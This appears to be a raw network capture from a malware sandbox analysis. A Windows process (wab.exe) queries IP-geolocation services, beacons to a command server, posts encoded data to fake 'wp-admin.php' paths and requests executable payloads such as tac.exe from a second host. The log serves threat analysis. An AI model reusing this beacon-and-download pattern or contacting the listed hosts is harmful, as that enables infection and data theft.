                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883220911 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883229017 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883255005 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883270979 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883270979 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883287907 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883302927 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883330107 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883342028 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883353949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883377075 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883377075 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883408070 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883414030 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883467913 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883482933 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883517027 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883536100 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883549929 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883583069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883610964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883610964 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883615017 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883644104 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883647919 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883681059 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883681059 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883717060 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883742094 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883749008 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883784056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883816004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883824110 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883824110 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883846045 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883850098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883882046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883908987 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.883908987 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.884040117 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923424006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923475981 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923495054 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923507929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923543930 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923557997 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923573971 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923588991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923621893 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923629999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923650026 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923657894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923669100 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.923722029 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926158905 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926192045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926225901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926246881 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926264048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926482916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926532984 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926567078 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926577091 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926579952 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926611900 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926659107 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926660061 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926692963 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926724911 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926739931 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926755905 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926769018 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926790953 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926805019 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926821947 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926853895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926866055 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926886082 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926902056 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.926934958 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927158117 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927203894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927206993 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927238941 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927273989 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927295923 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927299976 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927331924 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927362919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927370071 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927427053 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927534103 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.927534103 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.930757999 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.930949926 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.930982113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.930983067 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931003094 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931030989 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931036949 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931063890 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931096077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931108952 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931128025 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931142092 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931174994 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931174994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931204081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931247950 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931251049 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931282043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931301117 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931313038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931324005 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931344986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931355953 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931376934 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931430101 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931458950 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931505919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931539059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931551933 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931569099 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931600094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931615114 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931634903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.931668043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.733123064 CEST192.168.2.81.1.1.10x77fcStandard query (0)api64.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.786813974 CEST192.168.2.81.1.1.10x7baeStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.855766058 CEST192.168.2.81.1.1.10xe272Standard query (0)db-ip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.915896893 CEST192.168.2.81.1.1.10x807cStandard query (0)api.myip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:28.999408960 CEST192.168.2.81.1.1.10x1321Standard query (0)58yongzhe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.740956068 CEST1.1.1.1192.168.2.80x77fcNo error (0)api64.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.740956068 CEST1.1.1.1192.168.2.80x77fcNo error (0)api64.ipify.org104.237.62.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.794394016 CEST1.1.1.1192.168.2.80x7baeNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.865154982 CEST1.1.1.1192.168.2.80xe272No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.865154982 CEST1.1.1.1192.168.2.80xe272No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.865154982 CEST1.1.1.1192.168.2.80xe272No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.923899889 CEST1.1.1.1192.168.2.80x807cNo error (0)api.myip.com104.26.9.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.923899889 CEST1.1.1.1192.168.2.80x807cNo error (0)api.myip.com104.26.8.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.923899889 CEST1.1.1.1192.168.2.80x807cNo error (0)api.myip.com172.67.75.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.011310101 CEST1.1.1.1192.168.2.80x1321Name error (3)58yongzhe.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.84971145.91.200.135807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.105704069 CEST203OUTGET /api/wp-ping.php HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 45.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.703751087 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:20 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Data Raw: 66 69 73 68 31 35
                                                                                                                                                                                                                              Data Ascii: fish15
                                                                                                                                                                                                                              Sep 24, 2024 15:34:25.574994087 CEST275OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 133
                                                                                                                                                                                                                              Host: 45.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:25.575037003 CEST133OUTData Raw: 64 61 74 61 3d 31 6d 35 64 77 61 6b 6b 51 45 55 49 70 32 76 54 67 72 68 30 56 76 65 31 5a 33 78 6b 58 6d 56 73 50 2d 41 4b 4f 31 6f 64 38 47 36 32 35 36 78 55 62 5f 43 6b 6e 71 6f 64 59 65 38 38 5a 51 6c 4d 66 30 61 63 70 30 5a 35 4c 69 52 64 5a
                                                                                                                                                                                                                              Data Ascii: data=1m5dwakkQEUIp2vTgrh0Vve1Z3xkXmVsP-AKO1od8G6256xUb_CknqodYe88ZQlMf0acp0Z5LiRdZC1vz3Y9On7RZ8-WnGdHfJgeHUeuFViZqNHdoo6s2iYhjP_3hCIh


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.84972845.91.200.135807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:25.777246952 CEST275OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 133
                                                                                                                                                                                                                              Host: 45.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:25.777291059 CEST133OUTData Raw: 64 61 74 61 3d 43 30 53 57 36 2d 35 2d 4e 59 64 57 53 4d 71 48 52 32 42 35 31 79 63 5f 32 35 6e 70 71 65 54 71 61 52 46 54 79 6c 72 6b 6f 41 35 6f 67 45 38 6f 36 4b 44 34 58 2d 76 58 42 6f 33 6f 6e 36 44 57 51 44 46 36 33 34 32 42 38 39 6d 4d 4d
                                                                                                                                                                                                                              Data Ascii: data=C0SW6-5-NYdWSMqHR2B51yc_25npqeTqaRFTylrkoA5ogE8o6KD4X-vXBo3on6DWQDF6342B89mMMHakusf-aFBpco_kixc-5-JbN9wmDWhWuBoWkYQ1dMHARO2D6wAr
                                                                                                                                                                                                                              Sep 24, 2024 15:34:26.850547075 CEST363INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:26 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                              Content-Length: 108
                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Data Raw: 69 33 5a 36 34 57 2b 59 7a 67 61 7a 65 47 49 4f 46 45 48 73 44 6b 61 43 51 53 55 30 36 36 71 64 38 47 68 63 66 43 74 6b 4f 4e 34 76 54 33 71 67 54 4c 32 36 4c 39 6b 6f 4e 4c 68 41 37 64 4e 6d 62 57 63 5a 55 33 61 44 4e 4f 2b 72 6a 6b 74 50 4c 39 6a 4c 56 44 34 49 34 46 42 79 70 45 64 4f 74 55 49 66 64 47 2b 43 53 54 6f 3d
                                                                                                                                                                                                                              Data Ascii: i3Z64W+YzgazeGIOFEHsDkaCQSU066qd8GhcfCtkON4vT3qgTL26L9koNLhA7dNmbWcZU3aDNO+rjktPL9jLVD4I4FBypEdOtUIfdG+CSTo=
                                                                                                                                                                                                                              Sep 24, 2024 15:34:26.981273890 CEST275OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 133
                                                                                                                                                                                                                              Host: 45.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:26.981309891 CEST133OUTData Raw: 64 61 74 61 3d 49 37 48 43 48 71 2d 36 5a 4c 6f 4c 68 7a 44 30 72 43 53 39 4d 71 57 6e 37 52 4a 63 6c 31 33 61 66 7a 41 71 4d 6c 39 79 48 58 37 34 79 6a 7a 6d 70 39 51 77 63 51 30 64 78 34 6f 69 4d 43 69 34 34 32 70 73 6d 6c 6d 32 43 39 7a 58 6f
                                                                                                                                                                                                                              Data Ascii: data=I7HCHq-6ZLoLhzD0rCS9MqWn7RJcl13afzAqMl9yHX74yjzmp9QwcQ0dx4oiMCi442psmlm2C9zXoVhZvSozf7X8lu11-yJJ9iDtixmduXV3V1CxtWzuyclClYL7nc5c
                                                                                                                                                                                                                              Sep 24, 2024 15:34:27.923418999 CEST958INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:27 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                              Content-Length: 704
                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Data Raw: 66 79 4c 31 71 64 53 6e 41 44 54 69 4b 7a 72 4d 41 2f 65 6e 55 50 30 4a 5a 6d 52 78 5a 2f 43 59 63 2f 71 4c 75 41 4a 62 63 54 6d 56 65 4f 2b 32 48 7a 74 64 58 66 73 33 57 54 7a 30 30 61 6e 63 75 46 56 5a 39 74 62 73 69 53 30 35 5a 71 6c 75 4d 49 70 78 35 41 6b 5a 4a 68 6d 64 4f 4d 2f 43 4b 62 44 58 72 64 6c 42 47 49 71 59 52 6a 34 76 31 50 46 74 32 43 76 6a 32 74 34 54 66 6a 42 75 57 47 57 79 2b 6d 59 51 6e 6f 49 71 68 4c 78 30 34 34 4f 70 41 56 6e 46 67 48 35 2b 4a 4a 56 6d 56 59 6f 2f 7a 30 42 4f 41 6b 74 69 70 47 77 49 68 58 6c 4a 48 55 34 7a 77 4e 4f 61 56 45 75 4c 4e 41 67 67 59 44 46 36 77 35 70 61 6f 45 4b 32 36 39 6f 43 7a 75 6e 58 63 45 66 68 67 79 45 73 4f 6d 6b 58 46 54 51 53 51 49 36 4e 37 43 44 78 38 38 41 58 2f 38 49 4a 2f 6d 55 79 72 54 48 54 57 2f 79 59 4e 65 75 30 33 2b 77 56 50 4f 49 4b 4b 31 7a 4e 59 6e 43 45 42 34 6d 69 65 71 39 30 57 2b 56 77 4a 6b 47 7a 74 49 55 45 37 42 41 42 61 37 67 41 30 73 34 59 79 36 39 69 41 35 30 50 38 2f 4f 36 49 72 70 64 2f 6a 4e 54 4e 31 44 2f 52 62 [TRUNCATED]
                                                                                                                                                                                                                              Data Ascii: fyL1qdSnADTiKzrMA/enUP0JZmRxZ/CYc/qLuAJbcTmVeO+2HztdXfs3WTz00ancuFVZ9tbsiS05ZqluMIpx5AkZJhmdOM/CKbDXrdlBGIqYRj4v1PFt2Cvj2t4TfjBuWGWy+mYQnoIqhLx044OpAVnFgH5+JJVmVYo/z0BOAktipGwIhXlJHU4zwNOaVEuLNAggYDF6w5paoEK269oCzunXcEfhgyEsOmkXFTQSQI6N7CDx88AX/8IJ/mUyrTHTW/yYNeu03+wVPOIKK1zNYnCEB4mieq90W+VwJkGztIUE7BABa7gA0s4Yy69iA50P8/O6Irpd/jNTN1D/RbsgWm8eMAzd/VyojaxRkeF6tSYLbQF0diOdmMOydRjvXvLvbLf4TNUQqEE0g/mG2kbJp+NwFLa6Z7TbHPLAYXMSOG42Eq5aTe2wQB5v7kkvasBVOdHDEZow9iXrBOmn3w5D4gu7GxVgNXP58t+nO9z9lyGku5JHtq+Pnkl0wUn0TAR1sUN/1z4zfnxDr1wUUQs3Jo60bgaPoCmAoRAnD8krHgucOlAAtMI4IxIWiRsI+KOhFXvu4EcyG99lUrnrpnv8mIh/2B8dUDvvvsZZ2d/UjIkcYwZeLjNcdXLCRCYb627ckkXUtB8YKaK7NKQmBwolrL0vO0ybwU8M/UYwsY4zmrOFj4P9oyQpRIXgx7rr4YJM


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.2.849732103.130.147.211807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.004174948 CEST211OUTHEAD /Files/CheckTool.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              3192.168.2.849733103.130.147.211807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.004246950 CEST210OUTHEAD /Files/Channel2.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              4192.168.2.849734103.130.147.211807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.015225887 CEST205OUTHEAD /Files/tac.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.795741081 CEST277INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:29 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 12:41:11 GMT
                                                                                                                                                                                                                              ETag: "1a27530-622b4964af59a"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Length: 27424048
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
